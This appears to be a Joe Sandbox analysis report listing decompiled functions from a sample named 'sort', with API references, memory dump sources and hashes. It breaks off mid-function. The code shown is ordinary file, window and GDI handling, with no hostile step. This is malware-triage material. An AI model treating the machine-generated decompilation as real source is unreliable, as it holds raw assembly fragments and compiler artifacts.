Function 0041A759, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27
stringCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E0041A759(struct HWND__* _a4, intOrPtr _a8) {
				char _v16;
				signed int _t13;

				if(_a4 == 0 || (GetWindowLongA(_a4, 0xfffffff0) & 0x0000000f) != _a8) {
					return 0;
				} else {
					GetClassNameA(_a4,  &_v16, 0xa);
					_t13 = lstrcmpiA( &_v16, "combobox");
					asm("sbb eax, eax");
					return  ~_t13 + 1;
				}
			}

0x0041a763
0x00000000
0x0041a77c
0x0041a785
0x0041a794
0x0041a79c
0x00000000
0x0041a79e

APIs

GetWindowLongA.USER32 ref: 0041A76A
GetClassNameA.USER32(00000000,?,0000000A), ref: 0041A785
lstrcmpiA.KERNEL32(?,combobox), ref: 0041A794

Strings

combobox, xrefs: 0041A78E

Memory Dump Source

Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_sort.jbxd

Similarity

API ID: ClassLongNameWindowlstrcmpi
String ID: combobox
API String ID: 2054663530-2240613097
Opcode ID: a59dd8cb4dc7832684d3d012d2b80f62c9ff4b7594d5d7a01661a6692601d5aa
Instruction ID: 62da548da4bc7eed7f0096d352448fc276db36428101ee4b016d1f9566c4e5fc
Opcode Fuzzy Hash: a59dd8cb4dc7832684d3d012d2b80f62c9ff4b7594d5d7a01661a6692601d5aa
Instruction Fuzzy Hash: 66E0E53164020CBFCF219F60CC49F9D37B8E700305F508222B422D50E0D774E2968B99

Uniqueness

Uniqueness Score: -1.00%

Function 022421A0, Relevance: 6.2, APIs: 4, Instructions: 182COMMON

Download Yara Rule

APIs

IsBadHugeReadPtr.KERNEL32(00000000,00000014), ref: 022421F9
SetLastError.KERNEL32(0000007E), ref: 0224223B

Memory Dump Source

Source File: 00000001.00000002.931652161.0000000002241000.00000020.00000001.sdmp, Offset: 02241000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2241000_sort.jbxd

Similarity

API ID: ErrorHugeLastRead
String ID:
API String ID: 3239643929-0
Opcode ID: 22e466c1eab41c1afe8ef641dabf4e9276b766de88caa58412351ad9921ea2d7
Instruction ID: 1794e8db7e05d53f8fe4b74861cdc161bea041c8c89146419deee20f1b98ea31
Opcode Fuzzy Hash: 22e466c1eab41c1afe8ef641dabf4e9276b766de88caa58412351ad9921ea2d7
Instruction Fuzzy Hash: 2081BB75A10209DFDB08CF95C894BADBBB1FF48314F248298E909AB355C774EA81CF90

Uniqueness

Uniqueness Score: -1.00%

Function 0040FD44, Relevance: 6.2, APIs: 4, Instructions: 170
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040FD44(signed int _a4, signed int _a8, long _a12) {
				void _v5;
				signed int _v12;
				long _v16;
				signed int _t75;
				void* _t78;
				intOrPtr _t82;
				signed char _t83;
				signed char _t85;
				long _t86;
				void* _t88;
				signed char _t90;
				signed char _t91;
				signed int _t95;
				intOrPtr _t96;
				char _t98;
				signed int _t99;
				long _t101;
				long _t102;
				signed int _t103;
				intOrPtr _t106;
				signed int _t108;
				signed int _t109;
				signed int _t111;
				signed char _t112;
				signed char* _t113;
				long _t115;
				void* _t119;
				signed int _t120;
				intOrPtr* _t121;
				signed int _t123;
				signed char* _t124;
				void* _t125;
				void* _t126;

				_v12 = _v12 & 0x00000000;
				_t108 = _a8;
				_t119 = _t108;
				if(_a12 == 0) {
					L42:
					__eflags = 0;
					return 0;
				}
				_t75 = _a4;
				_t111 = _t75 >> 5;
				_t121 = 0x43b520 + _t111 * 4;
				_t123 = (_t75 & 0x0000001f) + (_t75 & 0x0000001f) * 8 << 2;
				_t78 =  *((intOrPtr*)(0x43b520 + _t111 * 4)) + _t123;
				_t112 =  *((intOrPtr*)(_t78 + 4));
				if((_t112 & 0x00000002) != 0) {
					goto L42;
				}
				if((_t112 & 0x00000048) != 0) {
					_t106 =  *((intOrPtr*)(_t78 + 5));
					if(_t106 != 0xa) {
						_a12 = _a12 - 1;
						 *_t108 = _t106;
						_t119 = _t108 + 1;
						_v12 = 1;
						 *((char*)( *_t121 + _t123 + 5)) = 0xa;
					}
				}
				if(ReadFile( *( *_t121 + _t123), _t119, _a12,  &_v16, 0) != 0) {
					_t82 =  *_t121;
					_t120 = _v16;
					_v12 = _v12 + _t120;
					_t31 = _t123 + 4; // 0x4
					_t113 = _t82 + _t31;
					_t83 =  *((intOrPtr*)(_t82 + _t123 + 4));
					__eflags = _t83 & 0x00000080;
					if((_t83 & 0x00000080) == 0) {
						L41:
						return _v12;
					}
					__eflags = _t120;
					if(_t120 == 0) {
						L15:
						_t85 = _t83 & 0x000000fb;
						__eflags = _t85;
						L16:
						 *_t113 = _t85;
						_t86 = _a8;
						_a12 = _t86;
						_t115 = _v12 + _t86;
						__eflags = _t86 - _t115;
						_v12 = _t115;
						if(_t86 >= _t115) {
							L40:
							_t109 = _t108 - _a8;
							__eflags = _t109;
							_v12 = _t109;
							goto L41;
						} else {
							goto L17;
						}
						while(1) {
							L17:
							_t88 =  *_a12;
							__eflags = _t88 - 0x1a;
							if(_t88 == 0x1a) {
								break;
							}
							__eflags = _t88 - 0xd;
							if(_t88 == 0xd) {
								__eflags = _a12 - _t115 - 1;
								if(_a12 >= _t115 - 1) {
									_a12 = _a12 + 1;
									_t95 = ReadFile( *( *_t121 + _t123),  &_v5, 1,  &_v16, 0);
									__eflags = _t95;
									if(_t95 != 0) {
										L26:
										__eflags = _v16;
										if(_v16 == 0) {
											L34:
											 *_t108 = 0xd;
											L35:
											_t108 = _t108 + 1;
											__eflags = _t108;
											L36:
											_t115 = _v12;
											__eflags = _a12 - _t115;
											if(_a12 < _t115) {
												continue;
											}
											goto L40;
										}
										_t96 =  *_t121;
										__eflags =  *(_t96 + _t123 + 4) & 0x00000048;
										if(( *(_t96 + _t123 + 4) & 0x00000048) == 0) {
											__eflags = _t108 - _a8;
											if(__eflags != 0) {
												L33:
												E0040AE93(__eflags, _a4, 0xffffffff, 1);
												_t126 = _t126 + 0xc;
												__eflags = _v5 - 0xa;
												if(_v5 == 0xa) {
													goto L36;
												}
												goto L34;
											}
											__eflags = _v5 - 0xa;
											if(__eflags != 0) {
												goto L33;
											}
											L32:
											 *_t108 = 0xa;
											goto L35;
										}
										_t98 = _v5;
										__eflags = _t98 - 0xa;
										if(_t98 == 0xa) {
											goto L32;
										}
										 *_t108 = 0xd;
										_t108 = _t108 + 1;
										 *((char*)( *_t121 + _t123 + 5)) = _t98;
										goto L36;
									}
									_t99 = GetLastError();
									__eflags = _t99;
									if(_t99 != 0) {
										goto L34;
									}
									goto L26;
								}
								_t101 = _a12 + 1;
								__eflags =  *_t101 - 0xa;
								if( *_t101 != 0xa) {
									 *_t108 = 0xd;
									_t108 = _t108 + 1;
									_a12 = _t101;
									goto L36;
								}
								_a12 = _a12 + 2;
								goto L32;
							}
							 *_t108 = _t88;
							_t108 = _t108 + 1;
							_a12 = _a12 + 1;
							goto L36;
						}
						_t124 =  *_t121 + _t123 + 4;
						_t90 =  *_t124;
						__eflags = _t90 & 0x00000040;
						if((_t90 & 0x00000040) == 0) {
							_t91 = _t90 | 0x00000002;
							__eflags = _t91;
							 *_t124 = _t91;
						}
						goto L40;
					}
					__eflags =  *_t108 - 0xa;
					if( *_t108 != 0xa) {
						goto L15;
					}
					_t85 = _t83 | 0x00000004;
					goto L16;
				}
				_t102 = GetLastError();
				_t125 = 5;
				if(_t102 != _t125) {
					__eflags = _t102 - 0x6d;
					if(_t102 == 0x6d) {
						goto L42;
					}
					_t103 = E00406F05(_t102);
					L10:
					return _t103 | 0xffffffff;
				}
				 *((intOrPtr*)(E00406F78())) = 9;
				_t103 = E00406F81();
				 *_t103 = _t125;
				goto L10;
			}

APIs

ReadFile.KERNEL32(?,?,00000000,?,00000000,?,?), ref: 0040FDBE
GetLastError.KERNEL32(?,?), ref: 0040FDC8
ReadFile.KERNEL32(?,?,00000001,?,00000000,?,?), ref: 0040FE8E
GetLastError.KERNEL32(?,?), ref: 0040FE98

Memory Dump Source

Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_sort.jbxd

Similarity

API ID: ErrorFileLastRead
String ID:
API String ID: 1948546556-0
Opcode ID: 23115844c508a177bbe59758e9f8f5cb7ac59ad074daaa557504e197aa77565a
Instruction ID: d01b3c0b8dd5da0b8901ede80a7d7d1cd1fd8d123d1325fb95f4599fb7a38ff2
Opcode Fuzzy Hash: 23115844c508a177bbe59758e9f8f5cb7ac59ad074daaa557504e197aa77565a
Instruction Fuzzy Hash: 7051C7306043859FDF31CF58C88479A7BB0EF12304F5445BBE851AB6E2D378994ACB99

Uniqueness

Uniqueness Score: -1.00%

Function 0041FCEC, Relevance: 6.1, APIs: 4, Instructions: 138
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E0041FCEC(void* __ecx, void* __edi, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				struct tagRECT _v28;
				struct tagRECT _v44;
				struct tagRECT _v60;
				void* _t79;
				int _t81;
				intOrPtr* _t83;
				intOrPtr _t87;
				intOrPtr _t106;
				int _t120;
				void* _t128;
				void* _t132;
				intOrPtr _t138;
				void* _t140;
				void* _t143;

				_t140 = __edi;
				_t128 = __ecx;
				_t79 = _a4 -  *((intOrPtr*)(__ecx + 4));
				_t132 = _a8 -  *((intOrPtr*)(__ecx + 8));
				_t138 =  *((intOrPtr*)(__ecx + 0x8c));
				_t143 = 2;
				if(_t138 == 0xa) {
					L7:
					 *((intOrPtr*)(_t128 + 0x28)) =  *((intOrPtr*)(_t128 + 0x28)) + _t79;
					L9:
					_t81 =  *((intOrPtr*)(_t128 + 0x30)) -  *((intOrPtr*)(_t128 + 0x28));
					__eflags = _t81;
					L10:
					if(_t81 < 0) {
						_t81 = 0;
					}
					_t83 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t128 + 0x68)))) + 0xbc))( &(_v28.right), _t81, _t143, _t140);
					_v12 =  *_t83;
					_v8 =  *((intOrPtr*)(_t83 + 4));
					GetWindowRect(GetDesktopWindow(),  &_v60);
					asm("movsd");
					asm("movsd");
					_t87 =  *((intOrPtr*)(_t128 + 0x8c));
					asm("movsd");
					asm("movsd");
					if(_t87 == 0xa || _t87 == 0xc) {
						_v44.left =  *((intOrPtr*)(_t128 + 0x58)) -  *((intOrPtr*)(_t128 + 0x60)) - _v12 + _v44.right;
						_v44.top =  *((intOrPtr*)(_t128 + 0x5c)) -  *((intOrPtr*)(_t128 + 0x64)) - _v8 + _v44.bottom;
						__eflags = IntersectRect( &_v28,  &_v60,  &_v44);
						if(__eflags != 0) {
							 *((intOrPtr*)(_t128 + 0x38)) =  *((intOrPtr*)(_t128 + 0x40)) - _v12;
							_t106 =  *((intOrPtr*)(_t128 + 0x44)) - _v8;
							__eflags = _t106;
							 *((intOrPtr*)(_t128 + 0x3c)) = _t106;
							 *(_t128 + 0x48) = _v44.left;
							 *((intOrPtr*)(_t128 + 0x4c)) = _v44.top;
						}
					} else {
						_v44.right =  *((intOrPtr*)(_t128 + 0x60)) -  *((intOrPtr*)(_t128 + 0x58)) + _v44.left + _v12;
						_v44.bottom =  *((intOrPtr*)(_t128 + 0x64)) -  *((intOrPtr*)(_t128 + 0x5c)) + _v44.top + _v8;
						_t120 = IntersectRect( &_v28,  &_v60,  &_v44);
						_t152 = _t120;
						if(_t120 != 0) {
							 *((intOrPtr*)(_t128 + 0x40)) =  *((intOrPtr*)(_t128 + 0x38)) + _v12;
							 *((intOrPtr*)(_t128 + 0x44)) =  *((intOrPtr*)(_t128 + 0x3c)) + _v8;
							 *((intOrPtr*)(_t128 + 0x50)) = _v44.right;
							 *((intOrPtr*)(_t128 + 0x54)) = _v44.bottom;
						}
					}
					 *((intOrPtr*)(_t128 + 4)) = _a4;
					 *((intOrPtr*)(_t128 + 8)) = _a8;
					return E0042007A(_t128, _t152, 0);
				}
				if(_t138 == 0xb) {
					__eflags = _t138 - 0xa;
					if(_t138 != 0xa) {
						_t14 = __ecx + 0x30;
						 *_t14 =  *((intOrPtr*)(__ecx + 0x30)) + _t79;
						__eflags =  *_t14;
						goto L9;
					}
					goto L7;
				} else {
					_t143 = 0x22;
					if(_t138 != 0xc) {
						_t8 = __ecx + 0x34;
						 *_t8 =  *((intOrPtr*)(__ecx + 0x34)) + _t132;
						__eflags =  *_t8;
					} else {
						 *((intOrPtr*)(__ecx + 0x2c)) =  *((intOrPtr*)(__ecx + 0x2c)) + _t132;
					}
					_t81 =  *((intOrPtr*)(_t128 + 0x34)) -  *((intOrPtr*)(_t128 + 0x2c));
					goto L10;
				}
			}

APIs

GetDesktopWindow.USER32 ref: 0041FD67
GetWindowRect.USER32 ref: 0041FD72
IntersectRect.USER32 ref: 0041FDBD
IntersectRect.USER32 ref: 0041FE11

Memory Dump Source

Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_sort.jbxd

Similarity

API ID: Rect$IntersectWindow$Desktop
String ID:
API String ID: 123605412-0
Opcode ID: 015e43c128581ee0b130330a2085ed8f419fa95b38046ca9c52191cf96206b73
Instruction ID: 7ef3134b71351d20188b2f6e6573302e8d5814b45845c27d755b710e50fb3d9e
Opcode Fuzzy Hash: 015e43c128581ee0b130330a2085ed8f419fa95b38046ca9c52191cf96206b73
Instruction Fuzzy Hash: 43517272A00209DFCF54DFA8D5C4ADEBBF5BF08314B1441A6E905EB20AE734E986CB54

Uniqueness

Uniqueness Score: -1.00%

Function 0040AF6B, Relevance: 6.1, APIs: 4, Instructions: 135
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040AF6B(long _a4, void* _a8, long _a12) {
				intOrPtr* _v8;
				long _v12;
				long _v16;
				signed int _v20;
				void _v1048;
				void** _t66;
				signed int _t67;
				intOrPtr _t69;
				signed int _t70;
				intOrPtr _t71;
				signed int _t73;
				signed int _t80;
				int _t85;
				long _t87;
				intOrPtr* _t91;
				intOrPtr _t97;
				struct _OVERLAPPED* _t101;
				long _t103;
				signed int _t105;
				struct _OVERLAPPED* _t106;

				_t101 = 0;
				_v12 = 0;
				_v20 = 0;
				if(_a12 != 0) {
					_t91 = 0x43b520 + (_a4 >> 5) * 4;
					_t105 = (_a4 & 0x0000001f) + (_a4 & 0x0000001f) * 8 << 2;
					__eflags =  *( *_t91 + _t105 + 4) & 0x00000020;
					if(__eflags != 0) {
						E0040AE93(__eflags, _a4, 0, 2);
					}
					_t66 =  *_t91 + _t105;
					__eflags = _t66[1] & 0x00000080;
					if((_t66[1] & 0x00000080) == 0) {
						_t67 = WriteFile( *_t66, _a8, _a12,  &_v16, _t101);
						__eflags = _t67;
						if(_t67 == 0) {
							_a4 = GetLastError();
						} else {
							_a4 = _t101;
							_v12 = _v16;
						}
						L15:
						_t69 = _v12;
						__eflags = _t69 - _t101;
						if(_t69 != _t101) {
							_t70 = _t69 - _v20;
							__eflags = _t70;
							return _t70;
						}
						__eflags = _a4 - _t101;
						if(_a4 == _t101) {
							L25:
							_t71 =  *_t91;
							__eflags =  *(_t71 + _t105 + 4) & 0x00000040;
							if(( *(_t71 + _t105 + 4) & 0x00000040) == 0) {
								L27:
								 *((intOrPtr*)(E00406F78())) = 0x1c;
								_t73 = E00406F81();
								 *_t73 = _t101;
								L24:
								return _t73 | 0xffffffff;
							}
							__eflags =  *_a8 - 0x1a;
							if( *_a8 == 0x1a) {
								goto L1;
							}
							goto L27;
						}
						_t106 = 5;
						__eflags = _a4 - _t106;
						if(_a4 != _t106) {
							_t73 = E00406F05(_a4);
						} else {
							 *((intOrPtr*)(E00406F78())) = 9;
							_t73 = E00406F81();
							 *_t73 = _t106;
						}
						goto L24;
					}
					__eflags = _a12 - _t101;
					_v8 = _a8;
					_a4 = _t101;
					if(_a12 <= _t101) {
						goto L25;
					} else {
						goto L6;
					}
					do {
						L6:
						_t80 =  &_v1048;
						do {
							__eflags = _v8 - _a8 - _a12;
							if(_v8 - _a8 >= _a12) {
								break;
							}
							_v8 = _v8 + 1;
							_t97 =  *_v8;
							__eflags = _t97 - 0xa;
							if(_t97 == 0xa) {
								_v20 = _v20 + 1;
								 *_t80 = 0xd;
								_t80 = _t80 + 1;
								__eflags = _t80;
							}
							 *_t80 = _t97;
							_t80 = _t80 + 1;
							__eflags = _t80 -  &_v1048 - 0x400;
						} while (_t80 -  &_v1048 < 0x400);
						_t103 = _t80 -  &_v1048;
						_t85 = WriteFile( *( *_t91 + _t105),  &_v1048, _t103,  &_v16, 0);
						__eflags = _t85;
						if(_t85 == 0) {
							_a4 = GetLastError();
							break;
						}
						_t87 = _v16;
						_v12 = _v12 + _t87;
						__eflags = _t87 - _t103;
						if(_t87 < _t103) {
							break;
						}
						__eflags = _v8 - _a8 - _a12;
					} while (_v8 - _a8 < _a12);
					_t101 = 0;
					__eflags = 0;
					goto L15;
				}
				L1:
				return 0;
			}

APIs

WriteFile.KERNEL32(?,?,?,?,00000000,00000001,?,?), ref: 0040B032

Memory Dump Source

Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_sort.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: fd880a33552e59a877ac07e62e70fb8bcc1509261c86d9df016157276de9b604
Instruction ID: 01ac4f6acfc5913959f88f192ecd96d6d2ffcc37b6012a8bce105fbf1c838ef3
Opcode Fuzzy Hash: fd880a33552e59a877ac07e62e70fb8bcc1509261c86d9df016157276de9b604
Instruction Fuzzy Hash: 21519371A00209EFCB11DF68C844B9E7BB4EF41344F1581BAE825AB291D734DA51CB9D

Uniqueness

Uniqueness Score: -1.00%

Function 00427B02, Relevance: 6.1, APIs: 4, Instructions: 117
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E00427B02(void* __ecx, int _a4, int _a8, int _a12) {
				intOrPtr _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				char _v32;
				intOrPtr _t60;
				intOrPtr _t61;
				intOrPtr _t66;
				int _t68;
				void* _t69;
				intOrPtr _t75;
				intOrPtr* _t78;
				signed short _t94;
				intOrPtr* _t107;
				signed int _t110;
				int* _t111;
				intOrPtr _t113;
				void* _t114;

				_t114 = __ecx;
				if( *((intOrPtr*)(__ecx + 0xec)) != 0) {
					_t89 = _a4;
					_t60 =  *((intOrPtr*)(__ecx + 0x90));
					 *(__ecx + 0xf8) = 1;
					_t110 = _a4 + _a4 * 4 << 3;
					 *((intOrPtr*)(_t60 + 0x20)) =  *((intOrPtr*)(_t60 + _t110 + 0x20));
					 *((intOrPtr*)(_t60 + 0x24)) =  *((intOrPtr*)(_t60 + _t110 + 0x24));
					_t61 =  *((intOrPtr*)(__ecx + 0x90));
					 *((intOrPtr*)(_t61 + 0x10)) =  *((intOrPtr*)(_t61 + _t110 + 0x10));
					 *((intOrPtr*)(_t61 + 0x14)) =  *((intOrPtr*)(_t61 + _t110 + 0x14));
					E00427C71(__ecx,  *((intOrPtr*)(__ecx + 0xf4)) + _t89, 0);
					E0042722C(__ecx,  *((intOrPtr*)(_t61 + _t110 + 0x14)), __eflags, 0);
					_t66 =  *((intOrPtr*)(_t114 + 0x90));
					_t111 = _t110 + _t66 + 0x18;
					_a8 = MulDiv(_a8,  *_t111,  *(_t110 + _t66 + 0x1c));
					_t68 = MulDiv(_a12,  *_t111, _t111[1]);
					_t107 =  *((intOrPtr*)(_t114 + 0x90));
					_a8 = _a8 +  *_t107;
					_t69 = _t68 +  *((intOrPtr*)(_t107 + 4));
					__eflags = _t69;
					_push(_t69);
					_push(_a8);
					return E0041B0C1(_t114,  *((intOrPtr*)(_t107 + 4)));
				}
				 *(__ecx + 0xf8) =  *(__ecx + 0xe8);
				ShowScrollBar( *(__ecx + 0x1c), 0, 0);
				_t75 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t114 + 0x114)))) + 0x5c));
				_t94 =  *((intOrPtr*)(_t75 + 0x1e));
				if(_t94 >= 0x8000) {
					L3:
					_a4 = 0;
					L4:
					ShowScrollBar( *(_t114 + 0x1c), 1, _a4);
					if(_a4 != 0) {
						_t78 =  *((intOrPtr*)(_t114 + 0x114));
						_v28 = 3;
						_t113 = 1;
						_v24 =  *( *((intOrPtr*)( *_t78 + 0x5c)) + 0x1c) & 0x0000ffff;
						_v20 =  *( *((intOrPtr*)( *_t78 + 0x5c)) + 0x1e) & 0x0000ffff;
						_v16 = _t113;
						if(E00415006(_t114, _t113,  &_v32, 0) == 0) {
							E00414F60(_t114, _t113, _v24, _v20, 0);
						}
					}
					return E00427C71(_t114,  *((intOrPtr*)(_t114 + 0xf4)), 1);
				}
				_a4 = 1;
				if((_t94 & 0x0000ffff) - ( *(_t75 + 0x1c) & 0x0000ffff) <= 0x7fff) {
					goto L4;
				}
				goto L3;
			}

APIs

ShowScrollBar.USER32(?,00000000,00000000), ref: 00427B32
ShowScrollBar.USER32(?,00000001,?), ref: 00427B6D
MulDiv.KERNEL32(?,?,?), ref: 00427C40
MulDiv.KERNEL32(?,?,?), ref: 00427C4D

Memory Dump Source

Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_sort.jbxd

Similarity

API ID: ScrollShow
String ID:
API String ID: 3611344627-0
Opcode ID: 2acf91cb5d467283592410175f9d93aeb9e8677cf2499e65e3e46aab8ffa07e5
Instruction ID: e36dfcb719c56f5c0c47cfadceb7236ddc00b612851f65575ceccfe99fb50706
Opcode Fuzzy Hash: 2acf91cb5d467283592410175f9d93aeb9e8677cf2499e65e3e46aab8ffa07e5
Instruction Fuzzy Hash: A1417C70600615AFCB14DF29D880EAABBF5FF88308F10856EF9199B361D774E851DB94

Uniqueness

Uniqueness Score: -1.00%

Function 0042007A, Relevance: 6.1, APIs: 4, Instructions: 112
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E0042007A(void* __ecx, void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				struct tagRECT _v40;
				void* __ebp;
				intOrPtr _t56;
				signed char _t60;
				signed char _t65;
				intOrPtr _t67;
				signed int _t73;
				void* _t76;
				intOrPtr _t84;
				intOrPtr _t95;

				_t56 = 1;
				_t76 = __ecx;
				_v24 = _t56;
				_v20 = _t56;
				_push(GetStockObject(0));
				_t84 = E0041A5FC();
				_v16 = _t84;
				_v8 = E00423BE7(__eflags);
				_t60 =  *(_t76 + 0x74);
				_v12 = _t84;
				if((0x0000a000 & _t60) == 0) {
					__eflags = _t60 & 0x00000050;
					if(__eflags == 0) {
						_v24 = GetSystemMetrics(0x20) - 1;
						_v20 = GetSystemMetrics(0x21) - 1;
						_t65 =  *(_t76 + 0x78);
						__eflags = 0x0000a000 & _t65;
						if((0x0000a000 & _t65) == 0) {
							L7:
							__eflags = _t65 & 0x00000050;
							if(__eflags == 0) {
								L10:
							} else {
								__eflags =  *(_t76 + 0x7c);
								if(__eflags == 0) {
									goto L10;
								} else {
									goto L9;
								}
							}
						} else {
							__eflags =  *(_t76 + 0x7c);
							if(__eflags != 0) {
								goto L7;
							}
						}
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_v12 = _v8;
					} else {
						goto L2;
					}
				} else {
					L2:
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
				}
				if(_a4 != 0) {
					_v20 = 0;
					_v24 = 0;
				}
				_t95 =  *0x439c3c; // 0x1
				if(_t95 != 0 && ( *(_t76 + 0x75) & 0x000000f0) != 0) {
					InflateRect( &_v40, 0xffffffff, 0xffffffff);
				}
				_t97 =  *(_t76 + 0x24);
				_t67 = _v8;
				if( *(_t76 + 0x24) == 0) {
					_t67 = _v16;
				}
				E00423C5A( *((intOrPtr*)(_t76 + 0x84)), _t97,  &_v40, _v24, _v20, _t76 + 0xc,  *((intOrPtr*)(_t76 + 0x1c)),  *((intOrPtr*)(_t76 + 0x20)), _v12, _t67);
				asm("movsd");
				 *((intOrPtr*)(_t76 + 0x1c)) = _v24;
				asm("movsd");
				asm("movsd");
				 *((intOrPtr*)(_t76 + 0x20)) = _v20;
				asm("movsd");
				_t73 = 0 | _v12 == _v8;
				 *(_t76 + 0x24) = _t73;
				return _t73;
			}

APIs

GetStockObject.GDI32(00000000), ref: 00420090

Part of subcall function 00423BE7: CreateBitmap.GDI32(00000008,00000008,00000001,00000001,004200A6), ref: 00423C26
Part of subcall function 00423BE7: CreatePatternBrush.GDI32(00000000), ref: 00423C33
Part of subcall function 00423BE7: DeleteObject.GDI32(00000000), ref: 00423C3F

GetSystemMetrics.USER32 ref: 004200D6
GetSystemMetrics.USER32 ref: 004200DE
InflateRect.USER32(?,000000FF,000000FF), ref: 00420134

Memory Dump Source

Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_sort.jbxd

Similarity

API ID: CreateMetricsObjectSystem$BitmapBrushDeleteInflatePatternRectStock
String ID:
API String ID: 419749085-0
Opcode ID: f04683a99d2cf70874936f412b73c80b9557d256e680e15b78c8faeb2f1dfe54
Instruction ID: e0589e39635e5819ef82d448fd258ad5fc30fad598c9d44a8e29054fd3acad8a
Opcode Fuzzy Hash: f04683a99d2cf70874936f412b73c80b9557d256e680e15b78c8faeb2f1dfe54
Instruction Fuzzy Hash: 1B413D71E006289BCF11CFA4D984BAEBBF5AF09310F514166ED10BB296D3B59E41CF94

Uniqueness

Uniqueness Score: -1.00%

Function 0040EB45, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 109
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E0040EB45(short* _a4, char* _a8, intOrPtr _a12, char* _a16, intOrPtr* _a20) {
				intOrPtr* _t29;
				int _t30;
				void* _t32;
				signed int _t33;
				int _t35;
				signed short* _t38;
				short* _t39;
				intOrPtr _t41;
				intOrPtr _t42;
				int _t46;
				signed char _t50;
				char* _t53;
				char* _t54;

				_t53 = _a8;
				if(_t53 == 0 || _a12 == 0) {
					L5:
					return 0;
				} else {
					_t50 =  *_t53;
					if(_t50 != 0) {
						_t29 = _a20;
						if(_t29 != 0) {
							_t42 =  *_t29;
							_t30 =  *(_t29 + 4);
						} else {
							_t42 =  *0x439eec; // 0x0
							_t30 =  *0x439efc; // 0x0
						}
						if(_t42 != 0) {
							_t54 = _a16;
							if( *_t54 == 0) {
								_t41 =  *0x437100; // 0x43710a
								if(( *(_t41 + 1 + (_t50 & 0x000000ff) * 2) & 0x00000080) == 0) {
									if(MultiByteToWideChar(_t30, 9, _t53, 1, _a4, 0 | _a4 != 0x00000000) != 0) {
										goto L13;
									}
									L21:
									_t33 = E00406F78();
									 *_t33 = 0x2a;
									return _t33 | 0xffffffff;
								}
								_t46 =  *0x43730c; // 0x1
								if(_a12 >= _t46) {
